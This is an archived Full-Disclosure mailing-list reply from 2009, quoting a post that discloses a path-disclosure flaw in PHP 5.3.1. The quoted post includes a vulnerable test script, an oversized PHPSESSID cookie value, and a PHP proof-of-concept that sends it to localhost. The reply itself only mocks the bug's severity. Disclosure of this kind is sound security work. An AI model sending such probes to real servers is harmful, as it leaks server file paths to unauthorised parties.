[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Path disclosure in PHP 5.3.1
- To: WHK <www.kernel32@xxxxxxxxx>, full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Path disclosure in PHP 5.3.1
- From: Jeff Williams <jeffwillis30@xxxxxxxxx>
- Date: Sun, 27 Dec 2009 17:01:59 +1100
Oh no a full path !
2009/12/27 WHK <www.kernel32@xxxxxxxxx>
> Make a script vulnerable:
> <?php
> session_start();
> if($_SESSION)
> echo $_SESSION;
> else
> $_SESSION = 'xx';
> ?>
>
> Now look the script in you explorer and change the value of cookie
> "PHPSESSID" to 300 chars "a" and look the disclosure:
> Warning: session_start() [function.session-start]:
> open(/tmp/sess_aaaaaaaaaaaaaaaaaa ..... aa in /opt/lampp/htdocs/test.php
> on line 3
>
> PoC:
> <?php
> error_reporting(0);
>
> $payload =
> 'GET / HTTP/1.1
> Host: 127.0.0.1
> Connection: close
> Cookie: PHPSESSID='.str_repeat('a', 500).';
>
> ';
>
> if(!$handle = fsockopen('127.0.0.1', 80)){
> die('Error');
> }else{
> fputs($handle, $payload);
> while(!feof($handle)){
> $retorno .= fread($handle, 1024);
> }
> echo nl2br(htmlspecialchars($retorno, ENT_QUOTES));
> }
> ?>
>
> if value of cookie is "aaaaaaa" then file in temp of server is
> "sess_aaaaaaa", if value of cookie is ax300 dont make file and return
> the error message.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/